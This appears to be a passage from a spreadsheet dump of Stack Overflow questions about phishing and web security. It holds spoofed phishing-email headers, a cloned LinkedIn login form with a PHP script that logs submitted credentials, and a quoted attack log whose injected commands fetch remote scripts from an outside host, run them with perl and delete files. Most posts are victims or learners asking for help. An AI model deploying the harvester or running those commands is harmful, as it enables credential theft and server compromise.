 Received: by 2002:a2e:6550:0:0:0:0:0 with SMTP id z77csp1970412ljb;
  Sat, 14 Sep 2019 06:12:14 -0700 (PDT)
 X-Google-Smtp-Source: APXvYqyy+BjN8TgEiJWD+O7IKWD/n0532Fxhp+f+75ffu4u0JU1esXRPEme/DcG7RaYnlDiaMUW8
 X-Received: by 2002:a9d:3f26:: with SMTP id m35mr46049370otc.66.1568466733949;
  Sat, 14 Sep 2019 06:12:13 -0700 (PDT)
 ARC-Seal: i=1; a=rsa-sha256; t=1568466733; cv=none;
  d=google.com; s=arc-20160816;
  b=KDIT95EakaPqwYj0OF6116ReXWrEwoqTDfWySmCU35uwaP1F09vv/zAsThE/ziMF9h
  iXFoXiNdBH2kGE1iGufqDyK/zm7AUsDRTLdFi5lRG3r326P2HylYdU7K6tnzwIOv/v+E
  meyuyWNVShq3nTKZEyiDBJg2pnoMrSOrNTghmnD2txnvvEmyLqiAE1MwHWI1AmedBTQ8
  xR0XS2DSsEr066m+5Iu2Yb3bjJIQNu1/8tcL6g+dy9XgQXagj3gdmKQoZKfOgK4K8b/g
  PUynWvl0on1vauSG72JfucvljjgdWuVSHAKDAepVm4EpdCEcdV41mv74Q/FQfrB1KAyh
  ZfwQ==
 ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
  h=content-transfer-encoding:subject:date:reply-to:to:from
  :mime-version:message-id:dkim-signature;
  bh=BsvrE3YWQDLvlA2k8W+wWmeOBtVwF3r0DTyYJGWVUkc=;
  b=aLF5hABuvBtaw58MtyXDMyjkhZiCSlp/1Hn5Cv9pHDLTvFTlwVRSCBy1B3sjQEzdiy
  LYRXcb5Ne/aii7bBxFSnkZRv5wt+csct6lGJ1BjEXL2rU3ZXF1CZQDMhS+Lge2jle8pO
  6n2eZ/9bQlWnzIgO95NG/mD0+eMJt2j43eC8JRcMYIYB480xEOENTb5Tv8isqvOnV7P6
  3cI3rctDup6kDv1jYXNkNuwSdk4f3BDfbMt5YQoJIeT3gdSI3jcC/0VCGzRb7yQ66uLL
  gfjKKpUuLnwB9CvoOdRMr7uJViLmO9rBoKn7MuRzz2wo/e5L5I7pieJrslsSQYGO7EYG
  Df2A==
 ARC-Authentication-Results: i=1; mx.google.com;
  dkim=pass header.i=@majlovesreg.one header.s=k1 header.b=IcrRZKl9;
  spf=pass (google.com: domain of bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one designates 69.72.42.1 as permitted sender) smtp.mailfrom="bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one"
 Return-Path: &amp;lt;bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one&amp;gt;
 Received: from m42-1.mailgun.net (m42-1.mailgun.net. [69.72.42.1])
  by mx.google.com with UTF8SMTPS id h16si3134596oie.262.2019.09.14.06.12.12
  for &amp;lt;#####@gmail.com&amp;gt;
  (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
  Sat, 14 Sep 2019 06:12:13 -0700 (PDT)
 Received-SPF: pass (google.com: domain of bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one designates 69.72.42.1 as permitted sender) client-ip=69.72.42.1;
 Authentication-Results: mx.google.com;
  dkim=pass header.i=@majlovesreg.one header.s=k1 header.b=IcrRZKl9;
  spf=pass (google.com: domain of bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one designates 69.72.42.1 as permitted sender) smtp.mailfrom="bounce+120cd3.e8b324-#####=gmail.com@majlovesreg.one"
 DKIM-Signature: a=rsa-sha256; v=1; c=relaxed/relaxed; d=majlovesreg.one; q=dns/txt; s=k1; t=1568466733; h=Content-Transfer-Encoding: Content-Type: Subject: Date: Reply-To: To: From: MIME-Version: Message-Id; bh=BsvrE3YWQDLvlA2k8W+wWmeOBtVwF3r0DTyYJGWVUkc=; b=IcrRZKl90xBY0yfOeKwqDhszwGRipiYn+KphrsykgMkctgkr2oRQ++eHjHm49YdfeHDoq0vu 7NV0/kpVaYewb0NWBAxDu8cTC2lU1g/+HOA0d/uA+R4p4BBc24TazKfhU3p+BrtOBD6PfqIl qtjepy/cO+127GcSAg6uWxVXKUA=
 X-Mailgun-Sending-Ip: 69.72.42.1
 X-Mailgun-Incoming: Yes
 Message-Id: &amp;lt;20190914131206.1.5A38D163B017E082@hms.harvard.edu&amp;gt;
 X-Envelope-From: &amp;lt;py@hms.harvard.edu&amp;gt;
 Received: from newsgw-02.dd24.net (newsgw-02.dd24.net [193.46.215.84]) by mxa.mailgun.org with ESMTP id 5d7ce726.7f54a6062110-smtp-in-n01; Sat, 14 Sep 2019 13:12:06 -0000 (UTC)
 Received: from WIN-ESHJO5UV0E0 (unknown [188.209.52.55]) by newsgw.dd24.net (Postfix) with ESMTPA id 1C9095FE52 for &amp;lt;#####@majlovesreg.one&amp;gt;; Sat, 14 Sep 2019 13:11:49 +0000 (UTC)
 MIME-Version: 1.0
 From: Monika Majewska &amp;lt;py@hms.harvard.edu&amp;gt;
 To: #####@majlovesreg.one
 Reply-To: manager@azibulon-group.com
 Date: 14 Sep 2019 06:12:04 -0700
 Subject: New Order Inquiry
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: quoted-printable
 &amp;lt;P&amp;gt;Hello,&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;We have sent several emails to you, but no response&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;Please let me know if #####@majlovesreg.one is the correct email to place =
 an order&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;I'm sorry for any inconvenience, if it's not your sales email, let me kn=
 ow and i won't send any more email.&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;Hope to get your response this time.&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;&amp;lt;SPAN style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI=
 ", Helvetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD=
 -SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: 700; COLOR: =
 rgb(29,34,40); FONT-STYLE: normal; TEXT-ALIGN: left; ORPHANS: 2; WIDOWS: 2;=
  DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(=
 255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varian=
 t-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: init=
 ial; text-decoration-color: initial'&amp;gt;Monika Majewska&amp;lt;/SPAN&amp;gt;&amp;lt;/P&amp;gt;
 &amp;lt;P&amp;gt;Sales Manager | Europe Region&amp;lt;BR&amp;gt;Azibulon Group&amp;lt;BR&amp;gt;Tel.:&amp;amp;nbsp; +49 901-9=
 29-3401 - Ext.3&amp;lt;BR&amp;gt;Fax.: +49 901-929-3402&amp;lt;/P&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;gmail&gt;&lt;mailgun&gt;&lt;spf&gt;&lt;dkim&gt;</t>
  </si>
  <si>
    <t>Form action is downloading the php file instead of running it</t>
  </si>
  <si>
    <t>&lt;p&gt;For a class I have to create a phishing site that runs on a VM. I am currently working on my PC and running the site as an HTML.&lt;/p&gt;
 &lt;p&gt;I changed the "form action=" "... to form action="process.php"...&lt;/p&gt;
 &lt;p&gt;The html file works fine when I use an address or another html file in the action="xyz" instead, but will download the .php file instead of running it.&lt;/p&gt;
 &lt;p&gt;Long story short: My HTMl file will download the php file instead of running it&lt;/p&gt;
 &lt;p&gt;HTML Snippet:&lt;br&gt;
 action = "process.php" is on line 1&lt;/p&gt;
 &lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false"&gt;
 &lt;div class="snippet-code"&gt;
 &lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;form action="process.php" method="GET" name="login" novalidate="novalidate" id="login" data-jsenabled="check" data-autologin="true" data-existingmembersignin="true"&amp;gt;
  &amp;lt;input type="hidden" name="isJsEnabled" value="false"/&amp;gt;
  &amp;lt;input type="hidden" name="source_app" value=""/&amp;gt;
  &amp;lt;input type="hidden" name="tryCount" id="tryCount" value=""/&amp;gt;
  &amp;lt;input type="hidden" name="clickedSuggestion" id="clickedSuggestion" value="false" /&amp;gt;
  &amp;lt;fieldset class="field-container field-container--fixed"&amp;gt;
  &amp;lt;legend&amp;gt;Sign in to LinkedIn&amp;lt;/legend&amp;gt;
  &amp;lt;div class="outer-wrapper"&amp;gt;
  &amp;lt;div class="inner-wrapper"&amp;gt;
  &amp;lt;div class="logo_container"&amp;gt;LinkedIn&amp;lt;/div&amp;gt;
  &amp;lt;ul class="form-fields" id="mini-profile--js"&amp;gt;
  &amp;lt;li class="form-email "&amp;gt;
  &amp;lt;div class="fieldgroup hide-label"&amp;gt;
  &amp;lt;label for="session_key-login" &amp;gt;Email address&amp;lt;/label&amp;gt;
  &amp;lt;span class="error" id="session_key-login-error"&amp;gt;&amp;lt;/span&amp;gt;
  &amp;lt;input type="text" name="session_key" value="" id="session_key-login" placeholder="Email address" aria-describedby="session_key-login-error"&amp;gt;
  &amp;lt;div class="domain-suggestion hide" id="domainSuggestion"&amp;gt;
  &amp;lt;span&amp;gt;Did you mean: &amp;lt;a id="suggestion" href="javascript:void(0);"&amp;gt;&amp;lt;/a&amp;gt;?&amp;lt;/span&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/li&amp;gt;
  &amp;lt;li class="form-password"&amp;gt;
  &amp;lt;div class="fieldgroup hide-label"&amp;gt;
  &amp;lt;label for="session_password-login" &amp;gt;Password&amp;lt;/label&amp;gt;
  &amp;lt;span class="error" id="session_password-login-error"&amp;gt;&amp;lt;/span&amp;gt;
  &amp;lt;div class="password_wrapper"&amp;gt;
  &amp;lt;input type="password" id="session_password-login" class="password" name="session_password" placeholder="Password" aria-describedby="session_password-login-error"/&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/li&amp;gt;
  &amp;lt;li class="button form-actions"&amp;gt;
  &amp;lt;div class="form-buttons"&amp;gt;
  &amp;lt;input type="submit" name="signin" value="Sign In" class="btn-primary" id="btn-primary"&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="forgot-password-container"&amp;gt;
  &amp;lt;a data-li-tooltip-id="login-tooltip"
  href="/uas/request-password-reset?session_redirect=&amp;amp;amp;trk=uas-login-forgot-password-text"
  tracking="uas-login-forgot-password-text" title="Forgot password?"&amp;gt;Forgot password?&amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;span&amp;gt;Not a member? &amp;lt;a href="/start/join?source=hb_signin&amp;amp;amp;trk=login_iframe_hb_signin"&amp;gt;Join now&amp;lt;/a&amp;gt;&amp;lt;/span&amp;gt;
  &amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="gaussian-blur"&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;&lt;/code&gt;&lt;/pre&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 header ('Location: http://racket-lang.org');
 $handle = fopen("log.txt", "a");
 foreach($_GET as $variable =&amp;gt; $value) {
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
 }
 fwrite($handle, "\r\n");
 fclose($handle);
 exit;
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Edit: formatting to make it look better&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;html&gt;&lt;action&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>I have been attacked PHP/script injection - dummy question</t>
  </si>
  <si>
    <t>&lt;p&gt;My website has been attacked for phishing purposes. It is a complex website however I only use post and PHP files.&lt;/p&gt;
 &lt;p&gt;How could they attack me? I only use $_POST so I believe no SQL command and parameters are visible. &lt;strong&gt;There is no framework just my little coding listing and accessing on the website.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Any hint/suggestion would be appreciated.&lt;/p&gt;
 &lt;p&gt;Sorry if I don't reply straight but I am dealing with my provider who blocked the whole site.&lt;/p&gt;
 &lt;p&gt;this is their answer (any comment on it will be welcomed):&lt;/p&gt;
 &lt;p&gt;Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack.&lt;/p&gt;
 &lt;p&gt;A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change:&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;The php.ini directives are...&lt;/p&gt;
 &lt;p&gt;allow_url_include = "0"&lt;/p&gt;
 &lt;h2&gt;allow_url_fopen = "0"&lt;/h2&gt;
 &lt;p&gt;update:&lt;/p&gt;
 &lt;p&gt;here is what I got from the webhost company:&lt;/p&gt;
 &lt;p&gt;121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download &lt;a href="http://some.thesome.com/etc/cup.txt;perl" rel="nofollow"&gt;http://some.thesome.com/etc/cup.txt;perl&lt;/a&gt; cup.txt;rm -rf *.txt*;wget
 &lt;a href="http://some.thesome.com/etc/update.txt;perl" rel="nofollow"&gt;http://some.thesome.com/etc/update.txt;perl&lt;/a&gt; update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?&gt;"&lt;/p&gt;</t>
  </si>
  <si>
    <t>RegEx - phishing attempts in HTML</t>
  </si>
  <si>
    <t>&lt;p&gt;I need ur help :(&lt;br&gt;
 What I want:&lt;br&gt;
 Match string if &lt;strong&gt;url.text&lt;/strong&gt; AND &lt;strong&gt;url.href&lt;/strong&gt; both contains URL, which are not equal (without protocol and subdomains). &lt;/p&gt;
 &lt;p&gt;It should work like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;a href="http://www.test1.net/dir1/index.html" target="_blank"&amp;gt;test1.net/admin&amp;lt;/a&amp;gt; &amp;lt;-- NOT MATCH
 &amp;lt;a href="https://test2.com"&amp;gt;THIS SITE&amp;lt;/a&amp;gt; &amp;lt;-- NOT MATCH
 &amp;lt;a href="https://subdomain.test3.org"&amp;gt;test2.org&amp;lt;/a&amp;gt; &amp;lt;-- MATCH
 &amp;lt;a href="http://www2.test4.com" target="_blank"&amp;gt;https://global.test4.com/index.html&amp;lt;/a&amp;gt; &amp;lt;-- NOT MATCH
 &amp;lt;a href="http://eu.test5.com"&amp;gt;https://evil.com/eu.test5.com/&amp;lt;/a&amp;gt; &amp;lt;-- MATCH
 &amp;lt;a href="http://eu.site6.com/index.html" target="_blank"&amp;gt;https: // eu. evil. com&amp;lt;/a&amp;gt; &amp;lt;-- MATCH
 &amp;lt;a href="https://site7.com/"&amp;gt;http://www.site7.com/123/test&amp;lt;/a&amp;gt; &amp;lt;-- NOT MATCH
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I started write something like &lt;a href="https://regex101.com/r/CQJKOM/4" rel="nofollow noreferrer"&gt;this&lt;/a&gt;, but I had a problem with my code doing the opposite.&lt;br&gt;
 Help me figure out how to make what I want. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;regex&gt;&lt;url&gt;&lt;href&gt;&lt;pcre&gt;</t>
  </si>
  <si>
    <t>How does this javascript/WScript launcher work?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a Linux guy trying to understand how a Windows machine got infected with ransomware. The victim got a phishing mail with a zipfile, the zipfile contains an obfuscated javascript, the script appears to download a malicious executable using MSXML2.XMLHTTP and then somehow transfers control to it with WScript.Shell&lt;/p&gt;
 &lt;p&gt;My question is how could this work without the user seeing any alerts or confirmation boxes (maybe he did and clicked past). Would it only work in Internet Explorer, or only on an unpatched machine, or is is a more general attack that would work in Firefox or Chrome.&lt;/p&gt;
 &lt;p&gt;The javascript code is at &lt;a href="http://andrew.triumf.ca/invoice_scan_A0FPqn.js.txt" rel="nofollow"&gt;http://andrew.triumf.ca/invoice_scan_A0FPqn.js.txt&lt;/a&gt;
 From my attempts to understand it with "node debug", the malware URLs are now offline, but it did work on Feb 25 and did infect a machine with 
 teslacrypt.&lt;/p&gt;</t>
  </si>
  <si>
    <t>user177800</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;malware&gt;&lt;wsh&gt;</t>
  </si>
  <si>
    <t>Setting up Proxy for adding special anti-phishing detection headers</t>
  </si>
  <si>
    <t>&lt;p&gt;We're running an event where visitors will register with Facebook onsite and will be given RFID tags for photos and wall posts during the event.&lt;/p&gt;
 &lt;p&gt;We're running into an issue where Facebook's anti-phishing measures are blocking our app because we have had so many Facebook auth requests originating from the same IP (we have a single broadband connection terminating at our event) in a short amount of time.&lt;/p&gt;
 &lt;p&gt;Facebook informed us we should proxy the requests so that we can add the following 2 headers before the request is finally sent over to Facebook.&lt;/p&gt;
 &lt;p&gt;X-Forwarded-For: (originating IP address of Client)
 X-Forwarded-For-Sig: (Fields below delimited by ‚Äú|‚Äù with HMAC-SHA1 hash.)&lt;/p&gt;
 &lt;p&gt;They explained how we should construct the values of the headers, but we're having trouble with getting a proxy set up. We've looked into nginx and squid (we have a local Linux server located at the event, but it is behind the router so it has a local IP).&lt;/p&gt;
 &lt;p&gt;Has anyone successfully set this up with Squid or other proxy software? Any help would be much appreciated, thanks!&lt;/p&gt;
 &lt;p&gt;Chris&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;facebook&gt;&lt;authentication&gt;&lt;proxy&gt;&lt;http-headers&gt;</t>
  </si>
  <si>
    <t>Vulnerable JavaScript function call</t>
  </si>
  <si>
    <t>&lt;p&gt;I have the following JavaScipt function in my application, that redirects user to the login page after a minute:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;(function redirect_expired() {
  $j.get('/app/ExpiredSession', function (resp) {
  if (resp &amp;amp;&amp;amp; resp.redirectTo) {
  window.location.href = resp.redirectTo;
  }
  });
  setInterval(redirect_expired, 60 * 1000);
 })();
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and a related Java servlet function:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@Override
 protected void doGet(HttpServletRequest req, HttpServletResponse resp) {
  PrintWriter pw = resp.getWriter();
  resp.setContentType("application/json");
  if (req.getSession != null &amp;amp;&amp;amp; req.getSession().getAttribute("authorizationBean") == null) {
  pw.print("{\"redirectTo\": \"" + req.getContentPath() + "\"}");
  } else {
  pw.print("{\"redirectTo\": \"\"}");
  }
  pw.close();
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I scan my application with Fortify, I got the following vulnerabilities in JavaScript function:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The method &lt;code&gt;lambda()&lt;/code&gt; sends unvalidated data to a web browser on line &lt;code&gt;window.location.href = resp.redirectTo;&lt;/code&gt;, which can result in the browser executing malicious code.&lt;/li&gt;
 &lt;li&gt;JS function passes unvalidated data to an HTTP redirect function on line &lt;code&gt;window.location.href = resp.redirectTo;&lt;/code&gt;. Alloving unvalidated input to control the URL used in rredirect can aid phishing attacks.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Could someone please explain me what is actually wrong with this redirect call &lt;code&gt;window.location.href = resp.redirectTo;&lt;/code&gt; and how I can fix it?&lt;/p&gt;
 &lt;p&gt;Maybe I can add some additional input check on Java side?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;java&gt;&lt;jquery&gt;&lt;security&gt;&lt;fortify&gt;</t>
  </si>
  <si>
    <t>How do I fix this 'phishing' warning in my app deployed in vercel?</t>
  </si>
  <si>
    <t>&lt;p&gt;Hi people: I deployed my videogames CRUD in heroku + vercel and I'm getting a &amp;quot;phishing warning&amp;quot; like this one from every browser when I visit the site:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ZsZW5.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ZsZW5.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I tried redeploying the app with a different name but I keep getting this error as others do when they visit it.&lt;/p&gt;
 &lt;p&gt;This is my site: &lt;a href="https://pi-videogames-nk.vercel.app/" rel="nofollow noreferrer"&gt;https://pi-videogames-nk.vercel.app/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Does anyone know what could be causing this? Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;node.js&gt;&lt;heroku&gt;&lt;crud&gt;&lt;vercel&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is there a generic approach to unshortening URLs without generating "hits"?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been tasked with performing realtime and historical analysis of shortened links that users include in their messaging, comparing them against databases of known-malicious URLs (e.g. &lt;a href="https://developers.google.com/safe-browsing/" rel="nofollow noreferrer"&gt;Google Safe Browsing&lt;/a&gt;, &lt;a href="https://openphish.com/" rel="nofollow noreferrer"&gt;OpenPhish&lt;/a&gt;).&lt;/p&gt;
 &lt;p&gt;However, a core use-case for link shortening done by our user-base is the collection of "hit" data, reflecting whether their link was clicked, who clicked it, when, etc. This presents the problem that I need to "unshorten" URLs without actually accessing them directly.&lt;/p&gt;
 &lt;p&gt;Some providers, such as &lt;a href="https://dev.bitly.com/v4/#operation/expandBitlink" rel="nofollow noreferrer"&gt;bit.ly&lt;/a&gt;, provide an API method to retrieve information about their shortened links. But, each API seems to be different, and often requires provider-specific API credentials.&lt;/p&gt;
 &lt;p&gt;Are there any popular libraries, services, or standardized approaches for dealing with this problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;hyperlink&gt;&lt;spam&gt;&lt;url-shortener&gt;&lt;bit.ly&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to force even absolutely positioned child elements within the bounds of a parent element</t>
  </si>
  <si>
    <t>&lt;p&gt;How to force &lt;strong&gt;child html elements&lt;/strong&gt; inside the bounds of a &lt;strong&gt;parent element&lt;/strong&gt;, such that even absolutely positioned child elements still remain within the bounds (or are clipped) of the parent element.&lt;/p&gt;
 &lt;p&gt;I am doing this because I want to prevent authors of &lt;strong&gt;child contents&lt;/strong&gt; from "Overriding my Page Content" with absolutely positioned elements.&lt;/p&gt;
 &lt;p&gt;I don't want to use iframe. My best solution is to use javascript to find all child elements with style position set to "absolute" or "fixed" and convert them to "static", howevever i'll like a better approach preferably non-javascript approach. Any help is good help.&lt;/p&gt;
 &lt;p&gt;NB: setting &lt;strong&gt;style="position:relative;"&lt;/strong&gt; for parent element only solves it for child elements with &lt;strong&gt;style="position:absolute;"&lt;/strong&gt;, and not &lt;strong&gt;style="position:fixed;"&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;css&gt;&lt;xhtml&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Selenium Grid - For Chrome browser when selenium node is run as a Windows service, I get InitSession unknown error: unable to discover open pages</t>
  </si>
  <si>
    <t>&lt;p&gt;I am a Selenium newbee. In fact I am covering for another automation tester.&lt;/p&gt;
 &lt;p&gt;I am trying to setup Selenium Grid, I have successfully setup Hub and node. 
 When I run Selenium node as a Windows Service, for chrome browser I get following error.&lt;/p&gt;
 &lt;p&gt;[0.535][INFO]: Launching chrome: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-client-side-phishing-detection --disable-component-update --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-web-resources --enable-logging --ignore-certificate-errors --load-extension="C:\Windows\TEMP\scoped_dir1396_19904\internal" --log-level=0 --metrics-recording-only --no-first-run --password-store=basic --remote-debugging-port=12964 --safebrowsing-disable-auto-update --test-type --use-mock-keychain --user-data-dir="C:\Windows\TEMP\scoped_dir1396_21178" data:,
 [60.676][INFO]: RESPONSE InitSession unknown error: unable to discover open pages&lt;/p&gt;
 &lt;p&gt;When I run node as a java program in command line (note - without windows service) it works fine. &lt;/p&gt;
 &lt;p&gt;Service is running as system user and I want to run the service as system user so that browsers don't show up when I remote login to the machine. 
 I have also tried it using a different admin account, the result is the same. &lt;/p&gt;
 &lt;p&gt;These are the versions I am using&lt;/p&gt;
 &lt;p&gt;Selenium 2.53.1
 Firefox version 45.2.0
 Chrome Version 52.0.2743.82 (Chrome driver 2.22)&lt;/p&gt;
 &lt;p&gt;These are the commands I run to complete the setup. Note, I am using NSSM to setup Windows Services.&lt;/p&gt;
 &lt;p&gt;I am setting up node and hub on the same machine for the initial setup.&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe install GridHub java -jar C:\Selenium\selenium-server-standalone-2.53.1.jar -role hub&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe start GridHub&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe stop GridNode&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe remove GridNode confirm&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe install GridNode java -Dwebdriver.chrome.driver="C:\Selenium\chromedriver-2.22\chromedriver.exe" -Dwebdriver.ie.driver="C:\Selenium\iedriver-2.53.1\IEDriverServer.exe" -jar C:\Selenium\selenium-server-standalone-2.53.1.jar -role webdriver -hub &lt;a href="http://x.x.x.x:4444/grid/reg" rel="nofollow"&gt;http://x.x.x.x:4444/grid/reg&lt;/a&gt; -Dwebdriver.chrome.logfile=C:\Selenium\chromedriver.log&lt;/p&gt;
 &lt;p&gt;C:\Selenium\nssm-2.24\win32\nssm.exe start GridNode&lt;/p&gt;
 &lt;p&gt;Any help is appreciated.&lt;/p&gt;
 &lt;p&gt;When I add no-sandbox option, it works smoothly&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;selenium&gt;&lt;selenium-webdriver&gt;&lt;selenium-grid&gt;&lt;selenium-grid2&gt;</t>
  </si>
  <si>
    <t>I can't find malicious files on server, but the urls work</t>
  </si>
  <si>
    <t>&lt;p&gt;Just found a nice way to spend a morning... Google wrote to us saying we have infected files on our website. They sent us the infected urls and it looks like a phishing attack when I visit them. However, when I try to locate these on my server, I can't find them. I looked at the source code of the infected urls and couldn't locate the css files neither on my server. Also, I ran the top level domain through Virustotal.com and the report came out clean. When I copy/paste the infected url in Virustotal, it tells me there's a phishing problem. &lt;/p&gt;
 &lt;p&gt;So, is there any other way to find the files on the server? Should I contact my host?&lt;/p&gt;
 &lt;p&gt;There are five files and they look alike except for the hash. After my domain name, here is what the url looks like : /~zczjzzkxzcz/x81/amli.assurance/amli.fr/amli.fr/free/sm/oo/ve/PortailAS/assure_somtc=true/dc0d2f6d7a36af8dfb05869f676736c7/index_2.html&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Polymorphish implementation with Hash Set for Specific data</t>
  </si>
  <si>
    <t>&lt;p&gt;I had a set of objects(Parent). For a specific condition, I want to add extra data to that object. So I create a child class extended from the parent, put data to child and put it back to parent set. Theoretically, it is possible. But is it the good way to do like this? Please suggest me any other better way.&lt;/p&gt;
 &lt;p&gt;Another way is to create set of Child instead of Parent. Put data to child directly. But I can't do it as Parent sets will transform to Json and excess field is not required for all of the Parent object.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;final LinkedHashSet&amp;lt;Parent&amp;gt; parentSet = new LinkedHashSet&amp;lt;Parent&amp;gt;();
 parentSet.add(new Parent("AAA"));
 parentSet.add(new Parent("ABC"));
 parentSet.add(new Parent("DXX"));
 parentSet.add(new Parent("GHI"));
 final LinkedHashSet&amp;lt;Parent&amp;gt; childSet = new LinkedHashSet&amp;lt;Parent&amp;gt;();
 final Iterator&amp;lt;Parent&amp;gt; iterator = parentSet.iterator();
 while (iterator.hasNext()) {
  final Parent parent = iterator.next();
  if (parent.str.startsWith("A")) {
  iterator.remove();
  childSet.add(new Child(parent.str, 27));
  }
 }
 parentSet.addAll(childSet);
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;polymorphism&gt;&lt;linkedhashset&gt;</t>
  </si>
  <si>
    <t>ValueError: invalid literal for int() with base 10: 'result'</t>
  </si>
  <si>
    <t>&lt;p&gt;while running the code&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; data = urllib.urlencode(parameters)
  req = urllib2.Request(url, data)
  logging.info('shivaniHAHOHJSJKDNVJNCMBVJDCVHJSHHHHEKLLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO')
  logging.info(data)
  try:
  response = urllib2.urlopen(req)
  except urllib2.URLError, e:
  self.redirect('/error')
  json_post = response.read()
  data = json.loads(json_post)
  self.redirect('/'+str(data))
  response_dict = simplejson.loads(json_post)
  virustotal = VirusTotal()
  logging.info('1111111111111111111111111111111111111111111111111')
  logging.info('result')
  logging.info(data[int('result')])
  if data ['result'] == 0:
  virustotal_result = True
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;i get following in my log file&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; ValueError: invalid literal for int() with base 10: 'result'
